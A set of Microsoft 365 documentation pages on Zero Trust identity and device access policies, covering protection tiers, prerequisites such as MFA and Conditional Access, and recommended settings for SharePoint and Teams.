-Zero Trust identity and device access settings and policies are recommended in three tiers:
--- Starting point.-- Enterprise.-- Specialized security for environments with highly regulated or classified data.-
-These tiers and their corresponding configurations provide consistent levels of Zero Trust protection across your data, identities, and devices. These capabilities and their recommendations:
--- Are supported in Microsoft 365 E3 and Microsoft 365 E5.-- Are aligned with [Microsoft Secure Score](../defender/microsoft-secure-score.md) and [identity score in Microsoft Entra ID](/entra/identity/monitoring-health/concept-identity-secure-score). Following the recommendations will increase these scores for your organization.-- Help you to implement these [five steps to securing your identity infrastructure](/azure/security/fundamentals/steps-secure-identity).-
-If your organization has unique requirements or complexities, use these recommendations as a starting point. However, most organizations can implement these recommendations as prescribed.
-
-Watch this video for a quick overview of identity and device access configurations for Microsoft 365 for enterprise.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RWxEDQ]
-
-> [!NOTE]
-> Microsoft also sells Enterprise Mobility + Security (EMS) licenses for Office 365 subscriptions. EMS E3 and EMS E5 capabilities are equivalent to those in Microsoft 365 E3 and Microsoft 365 E5. For more information, see [EMS plans](https://www.microsoft.com/microsoft-365/enterprise-mobility-security/compare-plans-and-pricing).
-
-## Intended audience
-
-These recommendations are intended for enterprise architects and IT professionals who are familiar with Microsoft 365 cloud productivity and security services. These services include Microsoft Entra ID (identity), Microsoft Intune (device management), and Microsoft Purview Information Protection (data protection).
-
-### Customer environment
-
-The recommended policies are applicable to enterprise organizations operating both entirely within the Microsoft cloud and for customers with hybrid identity infrastructure. A hybrid identity structure is an on-premises Active Directory forest that's synchronized with Microsoft Entra ID.
-
-Many of our recommendations rely on services that are available only with the following licenses:
--- Microsoft 365 E5.-- Microsoft 365 E3 with the E5 Security add-on.-- EMS E5.-- Microsoft Entra ID P2 licenses.-
-For organizations who don't have these licenses, we recommend that you at least implement [security defaults](/entra/fundamentals/security-defaults), which is included with all Microsoft 365 plans.
-
-### Caveats
-
-Your organization might be subject to regulatory or other compliance requirements, including specific recommendations that require you to apply policies that diverge from these recommended configurations. These configurations recommend usage controls that haven't historically been available. We recommend these controls because we believe they represent a balance between security and productivity.
-
-We've done our best to account for a wide variety of organizational protection requirements, but we're not able to account for all possible requirements or for all the unique aspects of your organization.
-
-## Three levels of protection
-
-Most organizations have specific requirements regarding security and data protection. These requirements vary by industry segment and by job functions within organizations. For example, your legal department and administrators might require additional security and information protection controls around their email correspondence that aren't required for other business units.
-
-Each industry also has their own set of specialized regulations. We aren't trying to provide a list of all possible security options or a recommendation per industry segment or job function. Instead, we're providing recommendations for three levels of security and protection that can be applied based on the granularity of your needs.
--- **Starting point**: We recommend all customers establish and use a minimum standard for protecting data, as well as the identities and devices that access your data. You can follow these recommendations to provide strong default protection as a starting point for all organizations.-- **Enterprise**: Some customers have a subset of data that must be protected at higher levels, or all data must be protected at a higher level. You can apply increased protection to all or specific data sets in your Microsoft 365 environment. We recommend protecting identities and devices that access sensitive data with comparable levels of security.-- **Specialized security**: As needed, a few customers have a small amount of data that is highly classified, constitutes trade secrets, or is regulated. Microsoft provides capabilities to help these customers meet these requirements, including added protection for identities and devices.--
-This guidance shows you how to implement Zero Trust protection for identities and devices for each of these levels of protection. Use this guidance as a minimum for your organization and adjust the policies to meet your organization's specific requirements.
-
-It's important to use consistent levels of protection across your identities, devices, and data. For example, protection for users with priority accounts&mdash;such as executives, leaders, managers, and others&mdash;should include the same level of protection for their identities, their devices, and the data they access.
-<!--
-
-The **Zero Trust identity and device protection for Microsoft 365** architecture model shows you which capabilities are comparable.
-
-[![Thumb image for Zero Trust Identity and device protection for Microsoft 365 poster.](../../media/microsoft-365-policies-configurations/zero-trust-id-device-protection-model-thumbnail.png)](../../downloads/MSFT_cloud_architecture_identity&device_protection.pdf) <br> [View as a PDF](../../downloads/MSFT_cloud_architecture_identity&device_protection.pdf) \| [Download as a PDF](https://github.com/MicrosoftDocs/microsoft-365-docs/raw/public/microsoft-365/downloads/MSFT_cloud_architecture_identity&device_protection.pdf) \| [Download as a Visio](https://github.com/MicrosoftDocs/microsoft-365-docs/raw/public/microsoft-365/downloads/MSFT_cloud_architecture_identity&device_protection.vsdx)
->-
-Additionally, see the [Deploy information protection for data privacy regulations](/microsoft-365/solutions/information-protection-deploy) solution to protect information stored in Microsoft 365.
-
-## Security and productivity trade-offs
-
-Implementing any security strategy requires trade-offs between security and productivity. It's helpful to evaluate how each decision affects the balance of security, functionality, and ease of use.
--
-The recommendations provided are based on the following principles:
--- Know your users and be flexible to their security and functional requirements.-- Apply a security policy just in time and ensure it's meaningful.-
-## Services and concepts for Zero Trust identity and device access protection
-
-Microsoft 365 for enterprise is designed for large organizations to empower everyone to be creative and work together securely.
-
-This section provides an overview of the Microsoft 365 services and capabilities that are important for Zero Trust identity and device access.
-
-### Microsoft Entra ID
-
-Microsoft Entra ID provides a full suite of identity management capabilities. We recommend using these capabilities to secure access.
-
-|Capability or feature|Description|Licensing|
-||||
-|[Multifactor authentication (MFA)](/entra/identity/authentication/concept-mfa-howitworks)|MFA requires users to provide two forms of verification, such as a user password plus a notification from the Microsoft Authenticator app or a phone call. MFA greatly reduces the risk that stolen credentials can be used to access your environment. Microsoft 365 uses the Microsoft Entra multifactor authentication service for MFA-based sign-ins.|Microsoft 365 E3 or E5|
-|[Conditional Access](/entra/identity/conditional-access/overview)|Microsoft Entra ID evaluates the conditions of the user sign-in and uses Conditional Access policies to determine the allowed access. For example, in this guidance we show you how to create a Conditional Access policy to require device compliance for access to sensitive data. This greatly reduces the risk that a hacker with their own device and stolen credentials can access your sensitive data. It also protects sensitive data on the devices, because the devices must meet specific requirements for health and security.|Microsoft 365 E3 or E5|
-|[Microsoft Entra groups](/entra/fundamentals/concept-learn-about-groups)|Conditional Access policies, device management with Intune, and even permissions to files and sites in your organization rely on the assignment to user accounts or Microsoft Entra groups. We recommend you create Microsoft Entra groups that correspond to the levels of protection you are implementing. For example, your executive staff are likely higher value targets for hackers. Therefore, it makes sense to add the user accounts of these employees to a Microsoft Entra group and assign this group to Conditional Access policies and other policies that enforce a higher level of protection for access.|Microsoft 365 E3 or E5|
-|[Device enrollment](/entra/identity/devices/overview)|You enroll a device into Microsoft Entra ID to create an identity for the device. This identity is used to authenticate the device when a user signs in and to apply Conditional Access policies that require domain-joined or compliant PCs. For this guidance, we use device enrollment to automatically enroll domain-joined Windows computers. Device enrollment is a prerequisite for managing devices with Intune.|Microsoft 365 E3 or E5|
-|[Microsoft Entra ID Protection](/entra/id-protection/overview-identity-protection)|Enables you to detect potential vulnerabilities affecting your organization's identities and configure automated remediation policy to low, medium, and high sign-in risk and user risk. This guidance relies on this risk evaluation to apply Conditional Access policies for multifactor authentication. This guidance also includes a Conditional Access policy that requires users to change their password if high-risk activity is detected for their account.|Microsoft 365 E5, Microsoft 365 E3 with the E5 Security add-on, EMS E5, or Microsoft Entra ID P2 licenses|
-|[Self-service password reset (SSPR)](/entra/identity/authentication/concept-sspr-howitworks)|Allow your users to reset their passwords securely and without help-desk intervention, by providing verification of multiple authentication methods that the administrator can control.|Microsoft 365 E3 or E5|
-|[Microsoft Entra password protection](/entra/identity/authentication/concept-password-ban-bad)|Detect and block known weak passwords and their variants and additional weak terms that are specific to your organization. Default global banned password lists are automatically applied to all users in a Microsoft Entra tenant. You can define additional entries in a custom banned password list. When users change or reset their passwords, these banned password lists are checked to enforce the use of strong passwords.|Microsoft 365 E3 or E5|
-
-Here are the components of Zero Trust identity and device access, including Intune and Microsoft Entra objects, settings, and subservices.
--
-### Microsoft Intune
-
-[Intune](/intune/introduction-intune) is Microsoft's cloud-based mobile device management service. This guidance recommends device management of Windows PCs with Intune and recommends device compliance policy configurations. Intune determines whether devices are compliant and sends this data to Microsoft Entra ID to use when applying Conditional Access policies.
-
-#### Intune app protection
-
-[Intune app protection](/intune/app-protection-policy) policies can be used to protect your organization's data in mobile apps, with or without enrolling devices into management. Intune helps protect information, making sure your employees can still be productive, and preventing data loss. By implementing app-level policies, you can restrict access to company resources and keep data within the control of your IT department.
-
-This guidance shows you how to create recommended policies to enforce the use of approved apps and to determine how these apps can be used with your business data.
-
-### Microsoft 365
-
-This guidance shows you how to implement a set of policies to protect access to Microsoft 365 cloud services, including Microsoft Teams, Exchange, SharePoint, and OneDrive. In addition to implementing these policies, we recommend you also raise the level of protection for your tenant using these resources:
--- [Configure your tenant for increased security](tenant-wide-setup-for-increased-security.md)-
-### Windows 11 or Windows 10 with Microsoft 365 Apps for enterprise
-
-Windows 11 or Windows 10 with Microsoft 365 Apps for enterprise is the recommended client environment for PCs. We recommend Windows 11 or Windows 10 because Microsoft Entra is designed to provide the smoothest experience possible for both on-premises and Microsoft Entra ID. Windows 11 or Windows 10 also includes advanced security capabilities that can be managed through Intune. Microsoft 365 Apps for enterprise includes the latest versions of Office applications. These use modern authentication, which is more secure and a requirement for Conditional Access. These apps also include enhanced compliance and security tools.
-
-## Applying these capabilities across the three levels of protection
-
-The following table summarizes our recommendations for using these capabilities across the three levels of protection.
-
-|Protection mechanism|Starting point|Enterprise|Specialized security|
-|||||
-|**Enforce MFA**|On medium or above sign-in risk|On low or above sign-in risk|On all new sessions|
-|**Enforce password change**|For high-risk users|For high-risk users|For high-risk users|
-|**Enforce Intune application protection**|Yes|Yes|Yes|
-|**Enforce Intune enrollment for organization-owned device**|Require a compliant or domain-joined PC, but allow bring-your-own devices (BYOD) phones and tablets|Require a compliant or domain-joined device|Require a compliant or domain-joined device|
-
-## Device ownership
-
-The above table reflects the trend for many organizations to support a mix of organization-owned devices, and personal or BYODs to enable mobile productivity across the workforce. Intune app protection policies ensure that email is protected from exfiltrating out of the Outlook mobile app and other Office mobile apps, on both organization-owned devices and BYODs.
-
-We recommend that organization-owned devices are managed by Intune or domain-joined to apply additional protections and control. Depending on data sensitivity, your organization might choose to not allow BYODs for specific user populations or specific apps.
-
-## Deployment and your apps
-
-Prior to configuring and rolling out Zero Trust identity and device access configuration for your Microsoft Entra integrated apps, you must:
--- Decide which apps used in your organization you want to protect.-- Analyze this list of apps to determine the sets of policies that provide appropriate levels of protection.-
- You shouldn't create separate sets of policies each for app because management of them can become cumbersome. Microsoft recommends that you group your apps that have the same protection requirements for the same users.
-
- For example, have one set of policies that include all Microsoft 365 apps for all users for starting point protection. Have a second set of policies for all sensitive apps, such as those used by human resources or finance departments, and apply them to those groups.
-
-Once you have determined the set of policies for the apps you want to secure, roll the policies out to users incrementally, addressing issues along the way. For example:
-
-1. Configure the policies that you intend to use for all Microsoft 365 apps.
-2. Add just Exchange with its required changes, roll out the policies to users, and work through any issues.
-3. Add Teams with its required changes, roll out the policies to users, and work through any issues.
-4. Add SharePoint with its required changes, roll out the policies to users, and work through any issues.
-5. Continue adding the rest of your apps until you can confidently configure these starting point policies to include all Microsoft 365 apps.
-
-Similarly, for your sensitive apps, create the set of policies and add one app at a time. Work through any issues until they're all included in the sensitive app policy set.
-
-Microsoft recommends that you don't create policy sets that apply to all apps because it can result in some unintended configurations. For example, policies that block all apps could lock your admins out of the Microsoft Entra admin center and exclusions can't be configured for important endpoints such as Microsoft Graph.
-
-## Steps to configure Zero Trust identity and device access
--
-1. Configure prerequisite identity features and their settings.
-2. Configure the common identity and access Conditional Access policies.
-3. Configure Conditional Access policies for guest and external users.
-4. Configure Conditional Access policies for Microsoft 365 cloud appsΓÇösuch as Microsoft Teams, Exchange, and SharePointΓÇöand Microsoft Defender for Cloud Apps policies.
-
-After you have configured Zero Trust identity and device access, see the [Microsoft Entra feature deployment guide](/entra/fundamentals/concept-secure-remote-workers) for a phased checklist of additional features to consider and [Microsoft Entra ID Governance](/entra/id-governance/) to protect, monitor, and audit access.
-
-## Next step
-
-[Prerequisite work for implementing Zero Trust identity and device access policies](zero-trust-identity-device-access-policies-prereq.md)
security Zero Trust Identity Device Access Policies Prereq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-prereq.md
- Title: Prerequisite work for implementing Zero Trust identity and device access policies
-description: This article describes the prerequisites you need to meet to use Zero Trust identity and device access policies and configurations.
-----
- - NOCSH
--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - m365solution-identitydevice
- - m365solution-scenario
- - zerotrust-solution
- - tier2
Previously updated : 07/24/2023--
-# Prerequisite work for implementing Zero Trust identity and device access policies
-
-This article describes the prerequisites admins must meet to use recommended Zero Trust identity and device access policies, and to use Conditional Access. It also discusses the recommended defaults for configuring client platforms for the best single sign-on (SSO) experience.
-
-## Prerequisites
-
-Before using the Zero Trust identity and device access policies that are recommended, your organization needs to meet prerequisites. The requirements are different for the various identity and authentication models listed:
--- Cloud-only-- Hybrid with password hash sync (PHS) authentication-- Hybrid with pass-through authentication (PTA)-- Federated-
-The following table details the prerequisite features and their configuration that apply to all identity models, except where noted.
-
-|Configuration|Exceptions|Licensing|
-||::||
-|[Configure PHS](/entra/identity/hybrid/connect/how-to-connect-password-hash-synchronization). This feature must be enabled to detect leaked credentials and to act on them for risk-based Conditional Access. **Note:** This is required regardless of whether your organization uses federated authentication.|Cloud-only|Microsoft 365 E3 or E5|
-|[Enable seamless single sign-on](/entra/identity/hybrid/connect/how-to-connect-sso) to automatically sign users in when they are on their organization devices connected to your organization network.|Cloud-only and federated|Microsoft 365 E3 or E5|
-|[Configure named locations](/entra/identity/conditional-access/location-condition#named-locations). Microsoft Entra ID Protection collects and analyzes all available session data to generate a risk score. We recommend you specify your organization's public IP ranges for your network in the Microsoft Entra ID named locations configuration. Traffic coming from these ranges is given a reduced risk score, and traffic from outside the organization environment is given a higher risk score.||Microsoft 365 E3 or E5|
-|[Register all users for self-service password reset (SSPR) and multifactor authentication (MFA)](/entra/identity/authentication/concept-registration-mfa-sspr-combined). We recommend you register users for Microsoft Entra multifactor authentication ahead of time. Microsoft Entra ID Protection makes use of Microsoft Entra multifactor authentication to perform additional security verification. Additionally, for the best sign-in experience, we recommend users install the [Microsoft Authenticator app](https://support.microsoft.com/account-billing/351498fc-850a-45da-b7b6-27e523b8702a) and the Microsoft Company Portal app on their devices. These can be installed from the app store for each platform.||Microsoft 365 E3 or E5|
-|[Plan your Microsoft Entra hybrid join implementation](/entra/identity/devices/hybrid-join-plan). Conditional Access will make sure devices connecting to apps are domain-joined or compliant. To support this on Windows computers, the device must be registered with Microsoft Entra ID. This article discusses how to configure automatic device registration.|Cloud-only|Microsoft 365 E3 or E5|
-|**Prepare your support team**. Have a plan in place for users that cannot complete MFA. This could be adding them to a policy exclusion group, or registering new MFA information for them. Before making either of these security-sensitive changes, you need to ensure that the actual user is making the request. Requiring users' managers to help with the approval is an effective step.||Microsoft 365 E3 or E5|
-|[Configure password writeback to on-premises AD](/entra/identity/authentication/tutorial-enable-sspr). Password writeback allows Microsoft Entra ID to require that users change their on-premises passwords when a high-risk account compromise is detected. You can enable this feature using Microsoft Entra Connect in one of two ways: either enable **Password Writeback** in the optional features screen of Microsoft Entra Connect setup, or enable it via Windows PowerShell.|Cloud-only|Microsoft 365 E3 or E5|
-|[Configure Microsoft Entra password protection](/entra/identity/authentication/concept-password-ban-bad). Microsoft Entra Password Protection detects and blocks known weak passwords and their variants, and can also block additional weak terms that are specific to your organization. Default global banned password lists are automatically applied to all users in a Microsoft Entra tenant. You can define additional entries in a custom banned password list. When users change or reset their passwords, these banned password lists are checked to enforce the use of strong passwords.||Microsoft 365 E3 or E5|
-|[Enable Microsoft Entra ID Protection](/entra/id-protection/overview-identity-protection). Microsoft Entra ID Protection enables you to detect potential vulnerabilities affecting your organization's identities and configure an automated remediation policy to low, medium, and high sign-in risk and user risk.||Microsoft 365 E5 or Microsoft 365 E3 with the E5 Security add-on|
-|**Enable modern authentication** for [Exchange Online](/Exchange/clients-and-mobile-in-exchange-online/enable-or-disable-modern-authentication-in-exchange-online) and for [Skype for Business Online](https://social.technet.microsoft.com/wiki/contents/articles/34339.skype-for-business-online-enable-your-tenant-for-modern-authentication.aspx). Modern authentication is a prerequisite for using MFA. Modern authentication is enabled by default for Office 2016 and 2019 clients, SharePoint, and OneDrive for Business.||Microsoft 365 E3 or E5|
-|[Enable continuous access evaluation](/entra/identity/conditional-access/concept-continuous-access-evaluation) for Microsoft Entra ID. Continuous access evaluation proactively terminates active user sessions and enforces tenant policy changes in near real-time.||Microsoft 365 E3 or E5|
-
-## Recommended client configurations
-
-This section describes the default platform client configurations that we recommend to provide the best SSO experience to your users, as well as the technical prerequisites for Conditional Access.
-
-### Windows devices
-
-We recommend Windows 11 or Windows 10 (version 2004 or later), as Azure is designed to provide the smoothest SSO experience possible for both on-premises and Microsoft Entra ID. Work or school-issued devices should be configured to join Microsoft Entra ID directly or if the organization uses on-premises AD domain join, those devices should be [configured to automatically and silently register with Microsoft Entra ID](/entra/identity/devices/hybrid-join-plan).
-
-For BYOD Windows devices, users can use **Add work or school account**. Note that users of the Google Chrome browser on Windows 11 or Windows 10 devices need to [install an extension](https://chrome.google.com/webstore/detail/windows-10-accounts/ppnbnpeolgkicgegkbkbjmhlideopiji?utm_source=chrome-app-launcher-info-dialog) to get the same smooth sign-in experience as Microsoft Edge users. Also, if your organization has domain-joined Windows 8 or 8.1 devices, you can install Microsoft Workplace Join for non-Windows 10 computers. [Download the package to register](https://www.microsoft.com/download/details.aspx?id=53554) the devices with Microsoft Entra ID.
-
-### iOS devices
-
-We recommend installing the [Microsoft Authenticator app](https://support.microsoft.com/account-billing/351498fc-850a-45da-b7b6-27e523b8702a) on user devices before deploying Conditional Access or MFA policies. At a minimum, the app should be installed when users are asked to register their device with Microsoft Entra ID by adding a work or school account, or when they install the Intune company portal app to enroll their device into management. This depends on the configured Conditional Access policy.
-
-### Android devices
-
-We recommend users install the [Intune Company Portal app](https://play.google.com/store/apps/details?id=com.microsoft.windowsintune.companyportal&hl=en) and [Microsoft Authenticator app](https://support.microsoft.com/account-billing/351498fc-850a-45da-b7b6-27e523b8702a) before Conditional Access policies are deployed or when required during certain authentication attempts. After app installation, users may be asked to register with Microsoft Entra ID or enroll their device with Intune. This depends on the configured Conditional Access policy.
-
-We also recommend that organization-owned devices are standardized on OEMs and versions that support Android for Work or Samsung Knox to allow mail accounts, be managed and protected by Intune MDM policy.
-
-### Recommended email clients
-
-The following email clients support modern authentication and Conditional Access.
-
-|Platform|Client|Version/Notes|
-||||
-|**Windows**|Outlook|2019, 2016<p>[Required updates](https://support.office.com/article/Outlook-Updates-472c2322-23a4-4014-8f02-bbc09ad62213)|
-|**iOS**|Outlook for iOS|[Latest](https://itunes.apple.com/us/app/microsoft-outlook-email-and-calendar/id951937596?mt=8)|
-|**Android**|Outlook for Android|[Latest](https://play.google.com/store/apps/details?id=com.microsoft.office.outlook&hl=en)|
-|**macOS**|Outlook|2019 and 2016|
-|**Linux**|Not supported||
-
-### Recommended client platforms when securing documents
-
-The following clients are recommended when a secure documents policy has been applied.
-
-|Platform|Word/Excel/PowerPoint|OneNote|OneDrive App|SharePoint App|[OneDrive sync client](/onedrive/enable-conditional-access)|
-|||||||
-|Windows 11 or Windows 10|Supported|Supported|N/A|N/A|Supported|
-|Windows 8.1|Supported|Supported|N/A|N/A|Supported|
-|Android|Supported|Supported|Supported|Supported|N/A|
-|iOS|Supported|Supported|Supported|Supported|N/A|
-|macOS|Supported|Supported|N/A|N/A|Not supported|
-|Linux|Not supported|Not supported|Not supported|Not supported|Not supported|
-
-### Microsoft 365 client support
-
-For more information about client support in Microsoft 365, see the following articles:
--- [Microsoft 365 Client App Support - Conditional Access](/microsoft-365/enterprise/microsoft-365-client-support-conditional-access)-- [Microsoft 365 Client App Support - multifactor authentication](/microsoft-365/enterprise/microsoft-365-client-support-multi-factor-authentication)-
-## Protecting administrator accounts
-
-For Microsoft 365 E3 or E5 or with separate Microsoft Entra ID P1 or P2 licenses, you can require MFA for administrator accounts with a manually created Conditional Access policy. See [Conditional Access: Require MFA for administrators](/entra/identity/conditional-access/howto-conditional-access-policy-admin-mfa) for the details.
-
-For editions of Microsoft 365 or Office 365 that do not support Conditional Access, you can enable [security defaults](/entra/fundamentals/security-defaults) to require MFA for all accounts.
-
-Here are some additional recommendations:
--- Use [Microsoft Entra Privileged Identity Management](/entra/id-governance/privileged-identity-management/pim-getting-started) to reduce the number of persistent administrative accounts.-- [Use privileged access management](/purview/privileged-access-management) to protect your organization from breaches that may use existing privileged admin accounts with standing access to sensitive data or access to critical configuration settings.-- Create and use separate accounts that are assigned [Microsoft 365 administrator roles](/entra/identity/role-based-access-control/manage-roles-portal) *only for administration*. Admins should have their own user account for regular non-administrative use and only use an administrative account when necessary to complete a task associated with their role or job function.-- Follow [best practices](/entra/identity/role-based-access-control/best-practices) for securing privileged accounts in Microsoft Entra ID.-
-## Next step
-
-[![Step 2: Configure the common Zero Trust identity and access Conditional Access policies.](../../medi)
-
-[Configure the common Zero Trust identity and device access policies](zero-trust-identity-device-access-policies-common.md)
security Zero Trust Identity Device Access Policies Sharepoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-sharepoint.md
- Title: Recommended secure document policies
-description: Describes the policies for Microsoft recommendations about how to secure SharePoint file access.
-----
- - NOCSH
--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - m365solution-identitydevice
- - m365solution-scenario
- - zerotrust-solution
- - highpri
- - tier1
Previously updated : 1/31/2023--
-# Policy recommendations for securing SharePoint sites and files
-
-This article describes how to implement the recommended Zero Trust identity and device access policies to protect SharePoint and OneDrive for Business. This guidance builds on the [common identity and device access policies](zero-trust-identity-device-access-policies-common.md).
-
-These recommendations are based on three different tiers of security and protection for SharePoint files that can be applied based on the granularity of your needs: **starting point**, **enterprise**, and **specialized security**. You can learn more about these security tiers, and the recommended client operating systems, referenced by these recommendations in [the overview](zero-trust-identity-device-access-policies-overview.md).
-
-In addition to implementing this guidance, be sure to configure SharePoint sites with the right amount of protection, including setting appropriate permissions for enterprise and specialized security content.
-
-## Updating common policies to include SharePoint and OneDrive for Business
-
-To protect files in SharePoint and OneDrive, the following diagram illustrates which policies to update from the common identity and device access policies.
--
-If you included SharePoint when you created the common policies, you only need to create the new policies. For Conditional Access policies, SharePoint includes OneDrive.
-
-The new policies implement device protection for enterprise and specialized security content by applying specific access requirements to SharePoint sites that you specify.
-
-The following table lists the policies you either need to review and update or create new for SharePoint. The common policies link to the associated configuration instructions in the [Common identity and device access policies](zero-trust-identity-device-access-policies-common.md) article.
-
-|Protection level|Policies|More information|
-||||
-|**Starting point**|[Require MFA when sign-in risk is *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Include SharePoint in the assignment of cloud apps.|
-||[Block clients that don't support modern authentication](zero-trust-identity-device-access-policies-common.md#block-clients-that-dont-support-multifactor-authentication)|Include SharePoint in the assignment of cloud apps.|
-||[Apply APP data protection policies](zero-trust-identity-device-access-policies-common.md#app-protection-policies)|Be sure all recommended apps are included in the list of apps. Be sure to update the policy for each platform (iOS, Android, Windows).|
-||[Use app enforced restrictions in SharePoint](#use-app-enforced-restrictions-in-sharepoint)|Add this new policy. This tells Microsoft Entra ID to use the settings specified in SharePoint. This policy applies to all users, but only affects access to sites included in SharePoint access policies.|
-|**Enterprise**|[Require MFA when sign-in risk is *low*, *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Include SharePoint in the assignments of cloud apps.|
-||[Require compliant PCs *and* mobile devices](zero-trust-identity-device-access-policies-common.md#require-compliant-pcs-and-mobile-devices)|Include SharePoint in the list of cloud apps.|
-||[SharePoint access control policy](#sharepoint-access-control-policies): Allow browser-only access to specific SharePoint sites from unmanaged devices.|This prevents editing and downloading of files. Use PowerShell to specify sites.|
-|**Specialized security**|[*Always* require MFA](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Include SharePoint in the assignment of cloud apps.|
-||[SharePoint access control policy](#use-app-enforced-restrictions-in-sharepoint): Block access to specific SharePoint sites from unmanaged devices.|Use PowerShell to specify sites.|
-
-## Use app-enforced restrictions in SharePoint
-
-If you implement access controls in SharePoint, Conditional Access policies are created in Microsoft Entra ID to tell Microsoft Entra ID to enforce the policies you configure in SharePoint. By default, this policy applies to all users, but only affects access to the sites you specify using PowerShell when you create the access controls in SharePoint. The policy can also be scoped for specific users, groups, or sites.
-
-To configure this policy see "Block or limit access to specific SharePoint site collections or OneDrive accounts" in [Control access from unmanaged devices](/sharepoint/control-access-from-unmanaged-devices).
-
-## SharePoint access control policies
-
-Microsoft recommends you protect content in SharePoint sites with enterprise and specialized security content with device access controls. You do this by creating a policy that specifies the level of protection and the sites to apply the protection to.
--- Enterprise sites: Allow browser-only access. This prevents users from editing and downloading files.-- Specialized security sites: Block access from unmanaged devices.-
-See "Block or limit access to specific SharePoint site collections or OneDrive accounts" in [Control access from unmanaged devices](/sharepoint/control-access-from-unmanaged-devices).
-
-## How these policies work together
-
-It's important to understand that SharePoint site permissions are typically based on business need for access to sites. These permissions are managed by site owners and can be highly dynamic. Using SharePoint device access policies ensures protection to these sites, regardless of whether users are assigned to a Microsoft Entra group associated with starting point, enterprise, or specialized security protection.
-
-The following illustration provides an example of how SharePoint device access policies protect access to sites for a user.
--
-James has starting point Conditional Access policies assigned, but he can be given access to SharePoint sites with enterprise or specialized security protection.
--- If James accesses a site he is a member of with enterprise or specialized security protection using his PC, his access is granted.-- If James accesses an enterprise protection site he is a member of using his unmanaged phone, which is allowed for starting point users, he will receive browser-only access to the enterprise site due to the device access policy configured for this site.-- If James accesses a specialized security site he is a member of using his unmanaged phone, he will be blocked due to the access policy configured for this site. He can only access this site using his managed PC.-
-## Next step
--
-Configure Conditional Access policies for:
--- [Microsoft Teams](zero-trust-identity-device-access-policies-teams.md)-- [Exchange Online](zero-trust-identity-device-access-policies-exchange.md)
security Zero Trust Identity Device Access Policies Teams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/zero-trust-identity-device-access-policies-teams.md
- Title: Recommended Teams policies - Microsoft 365 for enterprise | Microsoft Docs
-description: Describes the policies for Microsoft recommendations about how to secure Teams communication and file access.
----
- - NOCSH
- Previously updated : 1/31/2023--
- - it-pro
- - goldenconfig
-
- - M365-identity-device-management
- - m365-security
- - m365solution-identitydevice
- - m365solution-scenario
- - zerotrust-solution
- - highpri
- - tier1
--
-# Policy recommendations for securing Teams chats, groups, and files
-
-This article describes how to implement the recommended Zero Trust identity and device access policies to protect Microsoft Teams chats, groups, and content such as files and calendars. This guidance builds on the [common identity and device access policies](zero-trust-identity-device-access-policies-common.md), with additional information that's Teams-specific. Because Teams integrates with our other products, also see [Policy recommendations for securing SharePoint sites and files](zero-trust-identity-device-access-policies-sharepoint.md) and [Policy recommendations for securing email](zero-trust-identity-device-access-policies-exchange.md).
-
-These recommendations are based on three different tiers of security and protection for Teams that can be applied based on the granularity of your needs: starting point, enterprise, and specialized security. You can learn more about these security tiers and the recommended policies referenced by these recommendations in the [Identity and device access configurations](zero-trust-identity-device-access-policies-overview.md).
-
-More recommendations specific to Teams deployment are included in this article to cover specific authentication circumstances, including for users outside your organization. You'll need to follow this guidance for a complete security experience.
-
-## Getting started with Teams before other dependent services
-
-You don't need to enable dependent services to get started with Microsoft Teams. These services will all "just work." However, you do need to be prepared to manage the following service-related elements:
--- Microsoft 365 groups-- SharePoint team sites-- OneDrive for Business-- Exchange mailboxes-- Stream videos and Planner plans (if these services are enabled)-
-## Updating common policies to include Teams
-
-To protect chat, groups and content in Teams, the following diagram illustrates which policies to update from the common identity and device access policies. For each policy to update, make sure that Teams and dependent services are included in the assignment of cloud apps.
--
-These services are the dependent services to include in the assignment of cloud apps for Teams:
--- Microsoft Teams-- SharePoint and OneDrive for Business-- Exchange Online-- Skype for Business Online-- Microsoft Stream (meeting recordings)-- Microsoft Planner (Planner tasks and plan data)-
-This table lists the policies that need to be revisited and links to each policy in the [common identity and device access policies](zero-trust-identity-device-access-policies-common.md), which has the wider policy set for all Office applications.
-
-|Protection level|Policies|Further information for Teams implementation|
-||||
-|**Starting point**|[Require MFA when sign-in risk is *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Be sure Teams and dependent services are included in the list of apps. Teams has Guest Access and External Access rules to consider as well, you'll learn more about these rules later in this article.|
-||[Block clients that don't support modern authentication](zero-trust-identity-device-access-policies-common.md#block-clients-that-dont-support-multifactor-authentication)|Include Teams and dependent services in the assignment of cloud apps.|
-||[High risk users must change password](zero-trust-identity-device-access-policies-common.md#high-risk-users-must-change-password)|Forces Teams users to change their password when signing in if high-risk activity is detected for their account. Be sure Teams and dependent services are included in the list of apps.|
-||[Apply APP data protection policies](zero-trust-identity-device-access-policies-common.md#app-protection-policies)|Be sure Teams and dependent services are included in the list of apps. Update the policy for each platform (iOS, Android, Windows).|
-|**Enterprise**|[Require MFA when sign-in risk is *low*, *medium* or *high*](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Teams has Guest Access and External Access rules to consider as well, you'll learn more about these rules later in this article. Include Teams and dependent services in this policy.|
-||[Define device compliance policies](zero-trust-identity-device-access-policies-common.md#create-device-compliance-policies)|Include Teams and dependent services in this policy.|
-||[Require compliant PCs *and* mobile devices](zero-trust-identity-device-access-policies-common.md#require-compliant-pcs-and-mobile-devices)|Include Teams and dependent services in this policy.|
-|**Specialized security**|[*Always* require MFA](zero-trust-identity-device-access-policies-common.md#require-mfa-based-on-sign-in-risk)|Regardless of user identity, MFA will be used by your organization. Include Teams and dependent services in this policy. |
-
-## Teams dependent services architecture
-
-For reference, the following diagram illustrates the services Teams relies on. For more information and illustrations, see [Microsoft Teams and related productivity services in Microsoft 365 for IT architects](/microsoft-365/solutions/productivity-illustrations).
--
